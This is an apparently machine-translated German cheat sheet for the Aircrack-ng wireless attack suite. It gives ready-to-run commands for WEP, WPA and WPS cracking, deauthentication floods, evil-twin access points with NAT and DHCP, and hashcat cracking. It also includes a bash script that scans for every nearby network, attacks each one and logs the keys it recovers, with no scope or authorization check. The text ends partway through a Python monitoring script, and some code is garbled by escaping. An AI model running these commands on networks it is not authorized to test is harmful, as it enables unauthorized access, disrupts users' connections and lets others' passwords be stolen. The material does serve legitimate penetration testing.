Luftriß Cheat Blatt
Überblick
Aircrack-ng ist eine umfassende Suite mit kabellosen Netzwerk-Sicherheitsbewertungstools, die für die Prüfung von WLAN-Netzwerken und für die Prüfung von drahtlosen Sicherheits-Implementierungen konzipiert sind. Ursprünglich als Gabel des ursprünglichen Aircrack-Projekts entwickelt, hat sich Aircrack-ng zum de facto Standard für drahtlose Penetrationstests und Sicherheitsforschung entwickelt. Die Suite umfasst mehrere spezialisierte Tools, die zusammen arbeiten, um komplette drahtlose Netzwerkbewertung Fähigkeiten zu bieten, von der Paketerfassung und -injektion bis zur Verschlüsselung Schlüsselwiederherstellung und Access Point Manipulation.
Die Aircrack-ng-Suite besteht aus mehreren Kernkomponenten: Airodump-ng für drahtlose Paketerfassung und Netzwerk-Erkennung, Aireplay-ng für Paket-Injektion und Angriffs-Implementierung, Aircrack-ng für WEP und WPA/WPA2-Schlüsselrückgewinnung und Airmon-ng für drahtlose Schnittstellenverwaltung und Monitor-Modus-Konfiguration. Weitere Werkzeuge umfassen Airdecap-ng zum Entschlüsseln von erfassten Paketen, Paketforge-ng zum Erstellen von benutzerdefinierten Paketen und Airbase-ng zum Erstellen von gefälschten Access Points. Dieser modulare Ansatz ermöglicht es Sicherheitsexperten, gezielte Bewertungen durchzuführen und ihre Prüfmethodik basierend auf spezifischen Anforderungen anzupassen.
Das Framework unterstützt eine breite Palette von drahtlosen Sicherheitsprotokollen und Angriffsvektoren, einschließlich WEP-Cracking durch statistische Analyse, WPA/WPA2-Handshake-Capture und Wörterbuch-Angriffe, WPS PIN-Angriffe und verschiedene Injektionsangriffe für die Netzwerk-Resilienzprüfung. Aircrack-ng ist besonders wertvoll, um Schwachstellen-Implementierungen zu identifizieren, Zugriffspunktkonfigurationen zu testen und drahtlose Sicherheitsrichtlinien zu validieren. Mit seiner aktiven Entwicklungsgemeinschaft und umfangreichen Dokumentation ist Aircrack-ng ein unverzichtbares Werkzeug für drahtlose Sicherheitsexperten, Penetrationsprüfer und Netzwerkadministratoren, die für die Sicherung der drahtlosen Infrastruktur verantwortlich sind.
Installation
Ubuntu/Debian Installation
Installation von Aircrack-ng auf Ubuntu/Debian-Systeme:
```bash
Update system packages
sudo apt update && sudo apt upgrade -y
Install Aircrack-ng from repositories
sudo apt install -y aircrack-ng
Install additional dependencies
sudo apt install -y wireless-tools net-tools iw rfkill pcap-utils \ build-essential autoconf automake libtool pkg-config libnl-3-dev \ libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev \ libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev \ hostapd wpasupplicant tcpdump screen iw usbutils pciutils
Verify installation
aircrack-ng --help airodump-ng --help aireplay-ng --help
Check wireless interface capabilities
sudo airmon-ng
Install latest version from source (optional)
cd /tmp wget https://download.aircrack-ng.org/aircrack-ng-1.7.tar.gz tar -xzf aircrack-ng-1.7.tar.gz cd aircrack-ng-1.7
Configure and compile
autoreconf -i ./configure --with-experimental make -j$(nproc) sudo make install sudo ldconfig
Verify source installation
aircrack-ng --version ```_
CentOS/RHEL Installation
```bash
Install EPEL repository
sudo yum install -y epel-release
Install required packages
sudo yum groupinstall -y "Development Tools" sudo yum install -y wireless-tools iw rfkill pcap-devel openssl-devel \ sqlite-devel pcre-devel hwloc-devel cmocka-devel libnl3-devel \ autoconf automake libtool pkg-config ethtool
Install Aircrack-ng from EPEL
sudo yum install -y aircrack-ng
Alternative: Install from source
cd /tmp wget https://download.aircrack-ng.org/aircrack-ng-1.7.tar.gz tar -xzf aircrack-ng-1.7.tar.gz cd aircrack-ng-1.7
autoreconf -i ./configure --with-experimental make -j$(nproc) sudo make install
Configure firewall
sudo firewall-cmd --permanent --add-port=67/udp sudo firewall-cmd --permanent --add-port=68/udp sudo firewall-cmd --reload ```_
macOS Installation
```bash
Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Install Aircrack-ng
brew install aircrack-ng
Install additional tools
brew install wireshark tcpdump
Verify installation
aircrack-ng --version
Note: macOS requires compatible USB WiFi adapter for monitor mode
Built-in WiFi adapters typically don't support monitor mode
```_
Kali Linux Installation
```bash
Aircrack-ng is pre-installed on Kali Linux
Update to latest version
sudo apt update sudo apt install -y aircrack-ng
Install additional wireless tools
sudo apt install -y reaver bully wifite hostapd-wpe freeradius-wpe \ asleap john hashcat hcxtools hcxdumptool
Verify installation
aircrack-ng --version ```_
Docker Installation
Laufende Aircrack-ng in Docker:
```bash
Create Dockerfile for Aircrack-ng
cat > Dockerfile.aircrack << 'EOF' FROM ubuntu:22.04
Install dependencies
RUN apt-get update && apt-get install -y \ aircrack-ng wireless-tools iw rfkill \ tcpdump net-tools usbutils pciutils \ && rm -rf /var/lib/apt/lists/*
Create working directory
WORKDIR /data
Default command
CMD ["aircrack-ng", "--help"] EOF
Build Docker image
docker build -f Dockerfile.aircrack -t aircrack-ng .
Run with USB device access (for USB WiFi adapters)
docker run -it --rm --privileged \ -v $(pwd):/data \ --device=/dev/bus/usb \ aircrack-ng
Run specific Aircrack-ng command
docker run -it --rm --privileged \ -v $(pwd):/data \ aircrack-ng \ airodump-ng --help ```_
Basisnutzung
Schnittstellenmanagement
Verwaltung von drahtlosen Schnittstellen und Monitormodus:
```bash
Check wireless interfaces
sudo airmon-ng
Check interface details
iwconfig sudo iw dev
Kill interfering processes
sudo airmon-ng check kill
Enable monitor mode
sudo airmon-ng start wlan0
Check monitor mode interface (usually wlan0mon)
iwconfig
Change channel
sudo iwconfig wlan0mon channel 6 sudo iw dev wlan0mon set channel 6
Set specific frequency
sudo iw dev wlan0mon set freq 2437
Disable monitor mode
sudo airmon-ng stop wlan0mon
Restart network services
sudo systemctl restart NetworkManager sudo systemctl restart wpa_supplicant ```_
Network Discovery
Entdecken Sie drahtlose Netzwerke und Kunden:
```bash
Basic network scan
sudo airodump-ng wlan0mon
Scan specific channel
sudo airodump-ng -c 6 wlan0mon
Scan specific BSSID
sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF wlan0mon
Write capture to file
sudo airodump-ng -w capture wlan0mon
Show only WEP networks
sudo airodump-ng --encrypt WEP wlan0mon
Show only WPA networks
sudo airodump-ng --encrypt WPA wlan0mon
Scan with manufacturer lookup
sudo airodump-ng -M wlan0mon
Scan specific frequency range
sudo airodump-ng --band a wlan0mon # 5GHz sudo airodump-ng --band bg wlan0mon # 2.4GHz
Advanced scanning options
sudo airodump-ng -c 1-13 --band bg -w scan_results wlan0mon
Monitor specific network and clients
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w target wlan0mon ```_
WEP Angriffe
WEP Verschlüsselungsangriffe und Schlüsselrückgewinnung:
```bash
Capture WEP traffic
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0mon
ARP replay attack (in new terminal)
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
Fake authentication (if needed)
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
Fragmentation attack
sudo aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
ChopChop attack
sudo aireplay-ng -4 -b AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB wlan0mon
Interactive packet replay
sudo aireplay-ng -2 -b AA:BB:CC:DD:EE:FF -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 wlan0mon
Crack WEP key (run when sufficient IVs collected)
aircrack-ng wep_capture-01.cap
Crack with specific key length
aircrack-ng -n 64 wep_capture-01.cap # 64-bit WEP aircrack-ng -n 128 wep_capture-01.cap # 128-bit WEP
Use custom wordlist
aircrack-ng -w wordlist.txt wep_capture-01.cap ```_
WPA/WPA2 Angriffe
WPA/WPA2 Handshake fangen und knacken:
```bash
Capture WPA handshake
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_capture wlan0mon
Deauthentication attack to force handshake (in new terminal)
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
Target specific client
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:AA:BB wlan0mon
Verify handshake capture
aircrack-ng wpa_capture-01.cap
Crack with wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture-01.cap
Crack specific BSSID
aircrack-ng -b AA:BB:CC:DD:EE:FF -w wordlist.txt wpa_capture-01.cap
Use custom wordlist with rules
aircrack-ng -w custom_wordlist.txt wpa_capture-01.cap
Crack with ESSID
aircrack-ng -e "NetworkName" -w wordlist.txt wpa_capture-01.cap
Show handshake without cracking
aircrack-ng -J hashcat_format wpa_capture-01.cap
Convert to hashcat format
aircrack-ng -J hashcat_hashes wpa_capture-01.cap hashcat -m 2500 hashcat_hashes.hccapx wordlist.txt ```_
WEITER Angriffe
WPS (WiFi Protected Setup) Angriffe:
```bash
Scan for WPS-enabled networks
sudo airodump-ng --wps wlan0mon
Reaver WPS PIN attack
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
Reaver with specific options
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -L -N -d 15 -T .5 -c 6
Bully WPS attack
sudo bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon
Pixie dust attack
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K
WPS PIN generation
sudo aircrack-ng -W pin_list.txt
Check WPS lock status
sudo wash -i wlan0mon ```_
Erweiterte Funktionen
Injektion von Zollverpackungen
Erstellen und Injizieren von benutzerdefinierten Paketen:
```bash
Create custom ARP packet
sudo packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB -k 192.168.1.1 -l 192.168.1.100 -y fragment.xor -w arp_packet
Inject custom packet
sudo aireplay-ng -2 -r arp_packet wlan0mon
Create custom authentication packet
sudo packetforge-ng -1 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB -w auth_packet
Create deauthentication packet
sudo packetforge-ng -1 -a AA:BB:CC:DD:EE:FF -h CC:DD:EE:FF:AA:BB -w deauth_packet
Replay captured packet
sudo aireplay-ng -2 -r captured_packet.cap wlan0mon
Interactive packet replay with modifications
sudo aireplay-ng -2 -b AA:BB:CC:DD:EE:FF -d FF:FF:FF:FF:FF:FF -m 68 -n 86 wlan0mon ```_
Access Point Creation
Erstellen gefälschter Access Points und böser Zwillingsangriffe:
```bash
Create open access point
sudo airbase-ng -e "FreeWiFi" -c 6 wlan0mon
Create WEP access point
sudo airbase-ng -e "SecureWiFi" -c 6 -W 1 -z 2 -Z 4 wlan0mon
Create access point with specific BSSID
sudo airbase-ng -e "TestAP" -c 6 -a AA:BB:CC:DD:EE:FF wlan0mon
Evil twin attack (clone existing AP)
sudo airbase-ng -e "TargetNetwork" -c 6 -a AA:BB:CC:DD:EE:FF wlan0mon
Capture clients connecting to fake AP
sudo airbase-ng -e "FreeWiFi" -c 6 -P -C 30 wlan0mon
Create multiple access points
sudo airbase-ng -e "AP1" -e "AP2" -e "AP3" -c 6 wlan0mon
Advanced evil twin with DHCP
sudo airbase-ng -e "TargetNetwork" -c 6 -a AA:BB:CC:DD:EE:FF wlan0mon & sudo ifconfig at0 192.168.1.1 netmask 255.255.255.0 sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo iptables -A FORWARD -i at0 -o eth0 -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward
Start DHCP server for fake AP
sudo dnsmasq -C /dev/null -kd -F 192.168.1.100,192.168.1.200 -i at0 --bind-dynamic ```_
Fortgeschrittene Cracking-Techniken
Erweiterte Passwort-Cracking und Optimierung:
```bash
Multi-threaded cracking
aircrack-ng -w wordlist.txt -p 4 capture.cap
Cracking with custom character set
crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -w - capture.cap
Using John the Ripper with Aircrack-ng
aircrack-ng -J john_format capture.cap john --wordlist=wordlist.txt john_format.hccap
Hashcat integration
aircrack-ng -J hashcat_format capture.cap hashcat -m 2500 -a 0 hashcat_format.hccapx wordlist.txt
GPU-accelerated cracking with hashcat
hashcat -m 2500 -a 3 -w 3 hashcat_format.hccapx ?d?d?d?d?d?d?d?d
Mask attack with hashcat
hashcat -m 2500 -a 3 hashcat_format.hccapx ?u?l?l?l?l?l?d?d
Rule-based attack
hashcat -m 2500 -a 0 -r rules/best64.rule hashcat_format.hccapx wordlist.txt
Combination attack
hashcat -m 2500 -a 1 hashcat_format.hccapx wordlist1.txt wordlist2.txt
Distributed cracking setup
On master node:
hashcat -m 2500 -a 0 --session=distributed hashcat_format.hccapx wordlist.txt
On worker nodes:
hashcat -m 2500 -a 0 --session=worker1 --restore-file-path=distributed.restore hashcat_format.hccapx wordlist.txt ```_
Paketanalyse und Entschlüsselung
Analyse und Entschlüsselung erfasster Pakete:
```bash
Decrypt WEP packets
airdecap-ng -w 1234567890 wep_capture.cap
Decrypt WPA packets with passphrase
airdecap-ng -p passphrase -e "NetworkName" wpa_capture.cap
Decrypt with PMK
airdecap-ng -k pmk_file wpa_capture.cap
Extract specific packet types
airdecap-ng -t 1 capture.cap # Extract only data packets
Analyze packet statistics
aircrack-ng -s capture.cap
Show packet details
tcpdump -r decrypted_capture-dec.cap -v
Convert to other formats
tshark -r capture.cap -w converted.pcapng
Extract files from decrypted traffic
tcpflow -r decrypted_capture-dec.cap
Analyze with Wireshark
wireshark decrypted_capture-dec.cap ```_
Automatisierungsskripte
Umfassende WLAN Bewertung Script
```bash
!/bin/bash
Comprehensive WiFi security assessment script
Configuration
INTERFACE="wlan0" MONITOR_INTERFACE="" SCAN_TIME="60" ATTACK_TIME="300" OUTPUT_DIR="/tmp/wifi_assessment_$(date +%Y%m%d_%H%M%S)" WORDLIST="/usr/share/wordlists/rockyou.txt"
Create output directory
mkdir -p "$OUTPUT_DIR"
Logging function
log_message() \\{ echo "$(date '+%Y-%m-%d %H:%M:%S') - $1"|tee -a "$OUTPUT_DIR/assessment.log" \\}
Cleanup function
cleanup() \\{ log_message "Cleaning up..."
# Stop monitor mode
if [ -n "$MONITOR_INTERFACE" ]; then
sudo airmon-ng stop "$MONITOR_INTERFACE" >/dev/null 2>&1
fi
# Restart network services
sudo systemctl restart NetworkManager >/dev/null 2>&1
# Kill background processes
sudo pkill -f airodump-ng
sudo pkill -f aireplay-ng
sudo pkill -f aircrack-ng
log_message "Cleanup completed"
\\}
Signal handlers
trap cleanup EXIT trap cleanup INT trap cleanup TERM
Check if running as root
check_root() \\{ if [ "$EUID" -ne 0 ]; then echo "This script must be run as root" exit 1 fi \\}
Check dependencies
check_dependencies() \\{ log_message "Checking dependencies..."
local deps=("aircrack-ng" "airodump-ng" "aireplay-ng" "airmon-ng")
for dep in "$\\\\{deps[@]\\\\}"; do
if ! command -v "$dep" >/dev/null 2>&1; then
log_message "ERROR: $dep not found"
exit 1
fi
done
if [ ! -f "$WORDLIST" ]; then
log_message "WARNING: Wordlist not found at $WORDLIST"
WORDLIST=""
fi
log_message "Dependencies check passed"
\\}
Setup monitor mode
setup_monitor_mode() \\{ log_message "Setting up monitor mode on $INTERFACE..."
# Kill interfering processes
sudo airmon-ng check kill >/dev/null 2>&1
# Start monitor mode
local output
output=$(sudo airmon-ng start "$INTERFACE" 2>&1)
# Extract monitor interface name
| MONITOR_INTERFACE=$(echo "$output" | grep -o "$\\{INTERFACE\\}mon\ | mon[0-9]" | head -n 1) |
if [ -z "$MONITOR_INTERFACE" ]; then
MONITOR_INTERFACE="$\\\\{INTERFACE\\\\}mon"
fi
# Verify monitor mode
if iwconfig "$MONITOR_INTERFACE" 2>/dev/null|grep -q "Mode:Monitor"; then
log_message "Monitor mode enabled on $MONITOR_INTERFACE"
else
log_message "ERROR: Failed to enable monitor mode"
exit 1
fi
\\}
Network discovery
network_discovery() \\{ log_message "Starting network discovery for $SCAN_TIME seconds..."
local scan_file="$OUTPUT_DIR/network_scan"
# Start airodump-ng in background
sudo airodump-ng -w "$scan_file" --output-format csv "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local airodump_pid=$!
# Wait for scan time
sleep "$SCAN_TIME"
# Stop airodump-ng
sudo kill $airodump_pid 2>/dev/null
# Parse results
if [ -f "$\\\\{scan_file\\\\}-01.csv" ]; then
log_message "Networks discovered:"
# Parse CSV and display networks
| tail -n +2 "$\\{scan_file\\}-01.csv" | head -n -3 | while IFS=',' read -r bssid first_seen last_seen channel speed privacy cipher auth power beacons iv lan_ip id_length essid key; do | if [ -n "$bssid" ] && [ "$bssid" != "BSSID" ]; then essid=$(echo "$essid"|tr -d ' ') if [ -n "$essid" ]; then log_message " BSSID: $bssid, ESSID: $essid, Channel: $channel, Encryption: $privacy"
# Save target info
echo "$bssid,$essid,$channel,$privacy" >> "$OUTPUT_DIR/targets.txt"
fi
fi
done
else
log_message "No networks discovered"
fi
\\}
WEP attack
wep_attack() \\{ local bssid="$1" local essid="$2" local channel="$3"
log_message "Starting WEP attack against $essid ($bssid)"
local capture_file="$OUTPUT_DIR/wep_$\\\\{essid\\\\}_$(echo $bssid|tr ':' '_')"
# Set channel
sudo iwconfig "$MONITOR_INTERFACE" channel "$channel"
# Start capture
sudo airodump-ng -c "$channel" --bssid "$bssid" -w "$capture_file" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local airodump_pid=$!
# Wait a bit for capture to start
sleep 5
# Try fake authentication
sudo aireplay-ng -1 0 -a "$bssid" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local auth_pid=$!
# ARP replay attack
sudo aireplay-ng -3 -b "$bssid" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local arp_pid=$!
# Wait for attack time
sleep "$ATTACK_TIME"
# Stop attacks
sudo kill $airodump_pid $auth_pid $arp_pid 2>/dev/null
# Try to crack
if [ -f "$\\\\{capture_file\\\\}-01.cap" ]; then
log_message "Attempting to crack WEP key for $essid..."
local crack_result
crack_result=$(timeout 60 aircrack-ng "$\\\\{capture_file\\\\}-01.cap" 2>/dev/null)
if echo "$crack_result"|grep -q "KEY FOUND"; then
| local key=$(echo "$crack_result" | grep "KEY FOUND" | cut -d'[' -f2 | cut -d']' -f1) | log_message "SUCCESS: WEP key found for $essid: $key" echo "$bssid,$essid,WEP,$key" >> "$OUTPUT_DIR/cracked_keys.txt" else log_message "Failed to crack WEP key for $essid" fi fi \\}
WPA attack
wpa_attack() \\{ local bssid="$1" local essid="$2" local channel="$3"
log_message "Starting WPA attack against $essid ($bssid)"
local capture_file="$OUTPUT_DIR/wpa_$\\\\{essid\\\\}_$(echo $bssid|tr ':' '_')"
# Set channel
sudo iwconfig "$MONITOR_INTERFACE" channel "$channel"
# Start capture
sudo airodump-ng -c "$channel" --bssid "$bssid" -w "$capture_file" "$MONITOR_INTERFACE" >/dev/null 2>&1 &
local airodump_pid=$!
# Wait a bit for capture to start
sleep 5
# Deauthentication attack to capture handshake
for i in \\\\{1..5\\\\}; do
sudo aireplay-ng -0 10 -a "$bssid" "$MONITOR_INTERFACE" >/dev/null 2>&1
sleep 10
done
# Stop capture
sudo kill $airodump_pid 2>/dev/null
# Check for handshake
if [ -f "$\\\\{capture_file\\\\}-01.cap" ]; then
local handshake_check
handshake_check=$(aircrack-ng "$\\\\{capture_file\\\\}-01.cap" 2>/dev/null|grep "1 handshake")
if [ -n "$handshake_check" ]; then
log_message "Handshake captured for $essid"
# Try to crack with wordlist
if [ -n "$WORDLIST" ] && [ -f "$WORDLIST" ]; then
log_message "Attempting to crack WPA key for $essid with wordlist..."
local crack_result
crack_result=$(timeout 300 aircrack-ng -w "$WORDLIST" -b "$bssid" "$\\\\{capture_file\\\\}-01.cap" 2>/dev/null)
if echo "$crack_result"|grep -q "KEY FOUND"; then
| local key=$(echo "$crack_result" | grep "KEY FOUND" | cut -d'[' -f2 | cut -d']' -f1) | log_message "SUCCESS: WPA key found for $essid: $key" echo "$bssid,$essid,WPA,$key" >> "$OUTPUT_DIR/cracked_keys.txt" else log_message "Failed to crack WPA key for $essid with wordlist" echo "$bssid,$essid,WPA,HANDSHAKE_CAPTURED" >> "$OUTPUT_DIR/handshakes.txt" fi else log_message "No wordlist available for WPA cracking" echo "$bssid,$essid,WPA,HANDSHAKE_CAPTURED" >> "$OUTPUT_DIR/handshakes.txt" fi else log_message "No handshake captured for $essid" fi fi \\}
WPS attack
wps_attack() \\{ local bssid="$1" local essid="$2" local channel="$3"
log_message "Starting WPS attack against $essid ($bssid)"
# Set channel
sudo iwconfig "$MONITOR_INTERFACE" channel "$channel"
# Check if reaver is available
if command -v reaver >/dev/null 2>&1; then
# Try Pixie Dust attack first
log_message "Attempting Pixie Dust attack on $essid..."
local pixie_result
pixie_result=$(timeout 120 reaver -i "$MONITOR_INTERFACE" -b "$bssid" -c "$channel" -K -vv 2>/dev/null)
if echo "$pixie_result"|grep -q "WPS PIN:"; then
| local pin=$(echo "$pixie_result" | grep "WPS PIN:" | cut -d':' -f2 | tr -d ' ') | | local psk=$(echo "$pixie_result" | grep "WPA PSK:" | cut -d':' -f2 | tr -d ' ') | log_message "SUCCESS: WPS PIN found for $essid: $pin" log_message "SUCCESS: WPA PSK found for $essid: $psk" echo "$bssid,$essid,WPS,$pin,$psk" >> "$OUTPUT_DIR/cracked_keys.txt" else log_message "Pixie Dust attack failed for $essid"
# Try regular WPS PIN attack (limited time)
log_message "Attempting WPS PIN brute force on $essid..."
timeout 300 reaver -i "$MONITOR_INTERFACE" -b "$bssid" -c "$channel" -vv >/dev/null 2>&1
fi
else
log_message "Reaver not available for WPS attacks"
fi
\\}
Attack networks
attack_networks() \\{ log_message "Starting attacks on discovered networks..."
if [ ! -f "$OUTPUT_DIR/targets.txt" ]; then
log_message "No targets found"
return
fi
while IFS=',' read -r bssid essid channel encryption; do
if [ -n "$bssid" ]; then
log_message "Attacking $essid ($bssid) - $encryption"
case "$encryption" in
*"WEP"*)
wep_attack "$bssid" "$essid" "$channel"
;;
*"WPA"*)
wpa_attack "$bssid" "$essid" "$channel"
# Also try WPS if available
wps_attack "$bssid" "$essid" "$channel"
;;
*"OPN"*)
log_message "Open network detected: $essid"
echo "$bssid,$essid,OPEN,NO_PASSWORD" >> "$OUTPUT_DIR/open_networks.txt"
;;
esac
fi
done < "$OUTPUT_DIR/targets.txt"
\\}
Generate report
generate_report() \\{ log_message "Generating assessment report..."
local report_file="$OUTPUT_DIR/wifi_assessment_report.html"
cat > "$report_file" << EOF
WiFi Security Assessment Report
Generated: $(date)
Interface: $INTERFACE ($MONITOR_INTERFACE)
Scan Duration: $SCAN_TIME seconds
Attack Duration: $ATTACK_TIME seconds per target
Executive Summary
EOF # Count results local total_networks=0 local cracked_networks=0 local open_networks=0 local handshakes=0 if [ -f "$OUTPUT_DIR/targets.txt" ]; then total_networks=$(wc -l < "$OUTPUT_DIR/targets.txt") fi if [ -f "$OUTPUT_DIR/cracked_keys.txt" ]; then cracked_networks=$(wc -l < "$OUTPUT_DIR/cracked_keys.txt") fi if [ -f "$OUTPUT_DIR/open_networks.txt" ]; then open_networks=$(wc -l < "$OUTPUT_DIR/open_networks.txt") fi if [ -f "$OUTPUT_DIR/handshakes.txt" ]; then handshakes=$(wc -l < "$OUTPUT_DIR/handshakes.txt") fi cat >> "$report_file" << EOF- Total networks discovered: $total_networks
- Networks with compromised security: $cracked_networks
- Open networks: $open_networks
- WPA handshakes captured: $handshakes
Discovered Networks
| BSSID | ESSID | Channel | Encryption |
|---|---|---|---|
| $bssid | $essid | $channel | $encryption |
Security Vulnerabilities
EOF if [ -f "$OUTPUT_DIR/cracked_keys.txt" ]; then echo "Compromised Networks
" >> "$report_file" echo "| BSSID | ESSID | Type | Key/PIN |
|---|---|---|---|
| $bssid | $essid | $type | $key |
Open Networks
" >> "$report_file" echo "| BSSID | ESSID |
|---|---|
| $bssid | $essid |
Assessment Log
$(cat "$OUTPUT_DIR/assessment.log")
EOF
log_message "Report generated: $report_file"
\\}
Main execution
main() \\{ log_message "Starting WiFi security assessment"
check_root
check_dependencies
setup_monitor_mode
network_discovery
attack_networks
generate_report
log_message "Assessment completed. Results in: $OUTPUT_DIR"
\\}
Parse command line arguments
while [[ $# -gt 0 ]]; do case $1 in -i|--interface) INTERFACE="$2" shift 2 ;; -s|--scan-time) SCAN_TIME="$2" shift 2 ;; -a|--attack-time) ATTACK_TIME="$2" shift 2 ;; -w|--wordlist) WORDLIST="$2" shift 2 ;; -h|--help) echo "Usage: $0 [OPTIONS]" echo "Options:" echo " -i, --interface IFACE Wireless interface (default: wlan0)" echo " -s, --scan-time SECONDS Network discovery time (default: 60)" echo " -a, --attack-time SECONDS Attack time per target (default: 300)" echo " -w, --wordlist FILE Wordlist for WPA cracking" echo " -h, --help Show this help" exit 0 ;; *) echo "Unknown option: $1" exit 1 ;; esac done
Run main function
main ```_
Integrationsbeispiele
Continuous Monitoring Script
```python
!/usr/bin/env python3
Aircrack-ng continuous monitoring and alerting
import subprocess import time import json import smtplib import logging from datetime import datetime from email.mime.text import MimeText from email.mime.multipart import MimeMultipart
class WiFiMonitor: def init(self, config): self.config = config self.interface = config.get('interface', 'wlan0mon') self.scan_interval = config.get('scan_interval', 300) # 5 minutes self.known_networks = set() self.setup_logging()
def setup_logging(self):
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler('/var/log/wifi_monitor.log'),
logging.StreamHandler()
]
)
self.logger = logging.getLogger(__name__)
def scan_networks(self):
"""Scan for wireless networks"""
try:
# Run airodump-ng for a short scan
cmd = [
'timeout', '30',
'airodump-ng', '--output-format', 'csv',
'-w', '/tmp/wifi_scan', self.interface
]
subprocess.run(cmd, capture_output=True, text=True)
# Parse results
networks = self.parse_scan_results('/tmp/wifi_scan-01.csv')
return networks
except Exception as e:
self.logger.error(f"Error scanning networks: \\\\{e\\\\}")
return []
def parse_scan_results(self, csv_file):
"""Parse airodump-ng CSV output"""
networks = []
try:
with open(csv_file, 'r') as f:
lines = f.readlines()
# Find the start of network data
start_idx = 0
for i, line in enumerate(lines):
if line.startswith('BSSID'):
start_idx = i + 1
break
# Parse network entries
for line in lines[start_idx:]:
if line.strip() and not line.startswith('Station MAC'):
parts = line.split(',')
if len(parts) >= 14:
network = \\\\{
'bssid': parts[0].strip(),
'first_seen': parts[1].strip(),
'last_seen': parts[2].strip(),
'channel': parts[3].strip(),
'speed': parts[4].strip(),
'privacy': parts[5].strip(),
'cipher': parts[6].strip(),
'authentication': parts[7].strip(),
'power': parts[8].strip(),
'beacons': parts[9].strip(),
'iv': parts[10].strip(),
'lan_ip': parts[11].strip(),
'id_length': parts[12].strip(),
'essid': parts[13].strip(),
'timestamp': datetime.now().isoformat()
\\\\}
if network['bssid'] and network['essid']:
networks.append(network)
except FileNotFoundError:
self.logger.warning(f"Scan results file not found: \\\\{csv_file\\\\}")
except Exception as e:
self.logger.error(f"Error parsing scan results: \\\\{e\\\\}")
return networks
def detect_anomalies(self, networks):
"""Detect suspicious network activity"""
alerts = []
for network in networks:
network_id = f"\\\\{network['bssid']\\\\}_\\\\{network['essid']\\\\}"
# Check for new networks
if network_id not in self.known_networks:
self.known_networks.add(network_id)
# Alert on suspicious network names
suspicious_names = [
'free', 'wifi', 'internet', 'guest', 'public',
'linksys', 'netgear', 'dlink', 'default'
]
essid_lower = network['essid'].lower()
if any(name in essid_lower for name in suspicious_names):
alerts.append(\\\\{
'type': 'suspicious_network',
'severity': 'medium',
'message': f"Suspicious network detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\})",
'network': network
\\\\})
# Alert on open networks
if 'OPN' in network['privacy']:
alerts.append(\\\\{
'type': 'open_network',
'severity': 'low',
'message': f"Open network detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\})",
'network': network
\\\\})
# Alert on WEP networks
if 'WEP' in network['privacy']:
alerts.append(\\\\{
'type': 'weak_encryption',
'severity': 'high',
'message': f"WEP network detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\})",
'network': network
\\\\})
# Alert on potential evil twins
for known_network in self.known_networks:
if known_network != network_id:
known_essid = known_network.split('_', 1)[1]
if known_essid == network['essid']:
alerts.append(\\\\{
'type': 'potential_evil_twin',
'severity': 'high',
'message': f"Potential evil twin detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\})",
'network': network
\\\\})
# Check for high power levels (potential rogue AP)
try:
power = int(network['power'])
if power > -30: # Very high signal strength
alerts.append(\\\\{
'type': 'high_power_ap',
'severity': 'medium',
'message': f"High power AP detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\}) - Power: \\\\{power\\\\}dBm",
'network': network
\\\\})
except ValueError:
pass
return alerts
def send_alert(self, alert):
"""Send alert notification"""
self.logger.warning(f"ALERT [\\\\{alert['severity'].upper()\\\\}]: \\\\{alert['message']\\\\}")
# Send email if configured
if self.config.get('email', \\\\{\\\\}).get('enabled', False):
self.send_email_alert(alert)
# Send to SIEM if configured
if self.config.get('siem', \\\\{\\\\}).get('enabled', False):
self.send_siem_alert(alert)
def send_email_alert(self, alert):
"""Send email alert"""
try:
email_config = self.config['email']
msg = MimeMultipart()
msg['From'] = email_config['from']
msg['To'] = email_config['to']
msg['Subject'] = f"WiFi Security Alert - \\\\{alert['type']\\\\}"
body = f"""
WiFi Security Alert
Type: \\{alert['type']\\} Severity: \\{alert['severity']\\} Message: \\{alert['message']\\} Timestamp: \\{datetime.now().isoformat()\\}
